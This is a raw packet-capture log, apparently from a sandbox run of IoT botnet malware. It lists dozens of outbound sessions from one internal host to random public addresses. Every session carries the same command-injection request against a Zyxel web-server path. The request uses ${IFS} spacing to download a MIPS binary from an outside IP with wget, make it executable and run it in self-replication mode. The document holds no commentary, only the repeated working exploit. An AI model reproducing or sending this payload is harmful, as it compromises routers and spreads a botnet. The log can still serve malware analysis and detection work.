                                            Jan 14, 2024 15:50:17.140132904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            237192.168.2.2339876204.253.93.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.140151024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            238192.168.2.234027063.228.71.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.140264988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            239192.168.2.2343976179.228.126.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.140275002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            240192.168.2.2343274155.106.235.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.140314102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            241192.168.2.2352972204.192.206.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.140396118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            242192.168.2.234588837.222.153.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.140440941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            243192.168.2.236020436.40.15.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.140485048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            244192.168.2.235937692.46.126.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.140485048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            245192.168.2.2348026170.19.204.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.147857904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            246192.168.2.2360610223.125.213.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.147896051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            247192.168.2.2360688216.229.35.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.147912025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            248192.168.2.233589689.78.118.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.147962093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            249192.168.2.2338562194.203.191.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:18.150823116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            250192.168.2.2338660100.170.22.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:18.150857925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            251192.168.2.2349334103.95.139.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:18.150878906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            252192.168.2.2332788100.231.33.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:18.150945902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            253192.168.2.234345281.110.17.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:18.150966883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            254192.168.2.2345260141.54.122.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:18.150990963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            255192.168.2.2354132221.81.81.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:18.151089907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            256192.168.2.2353304222.204.16.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:18.151094913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            257192.168.2.2336866141.255.136.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:18.151174068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            258192.168.2.2358744192.135.151.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:18.151242971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            259192.168.2.2348980148.242.9.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:18.151245117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            260192.168.2.2359630130.60.151.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:18.151245117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            261192.168.2.2337266203.164.6.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:18.151289940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            262192.168.2.233303288.51.232.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:18.151329041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            263192.168.2.235758038.151.146.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:19.154997110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            264192.168.2.235713648.111.101.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:19.155045986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            265192.168.2.2351160210.79.34.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:19.155070066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            266192.168.2.234291088.44.195.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:19.155116081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            267192.168.2.234911269.24.125.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:19.155292988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            268192.168.2.2339400168.13.157.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:20.158006907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            269192.168.2.234171045.58.217.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:20.158049107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            270192.168.2.2345904104.143.179.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:20.158052921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            271192.168.2.236029687.126.11.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:20.158082962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            272192.168.2.2357902164.109.191.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:20.158093929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            273192.168.2.2333596117.228.16.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:20.158121109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            274192.168.2.2357870108.159.159.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:20.158162117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            275192.168.2.23406044.71.219.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:20.158174038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            276192.168.2.234495658.115.110.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:20.158195972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            277192.168.2.235524013.31.158.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:20.158210993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            278192.168.2.234063438.1.88.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:20.158387899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            279192.168.2.2359638176.73.53.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:20.158483982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            280192.168.2.2352100192.37.168.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:20.158516884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            281192.168.2.2344102125.172.6.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:20.158534050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            282192.168.2.2345588164.139.240.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:21.160749912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            283192.168.2.2333616110.113.221.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:21.160768986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            284192.168.2.2343054115.160.215.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:21.160778046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            285192.168.2.2357642131.234.141.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:21.160800934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            286192.168.2.2351852153.73.81.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:21.160825014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            287192.168.2.233346443.183.225.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:21.160842896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            288192.168.2.234361452.203.88.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:21.160885096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            289192.168.2.234216038.87.196.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:21.160893917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            290192.168.2.2358772205.210.247.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:21.160912037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            291192.168.2.2348634185.248.15.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:21.161072016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            292192.168.2.233475272.83.223.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:21.161072016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            293192.168.2.23520341.123.94.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:21.161144018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            294192.168.2.2338930149.193.109.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164293051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            295192.168.2.235267283.10.204.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164304018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            296192.168.2.2357348182.228.115.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164340973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            297192.168.2.234961231.230.238.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164340973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            298192.168.2.2334026179.131.173.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164398909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            299192.168.2.2340260109.170.192.14443
                                            TimestampBytes transferredDirectionData
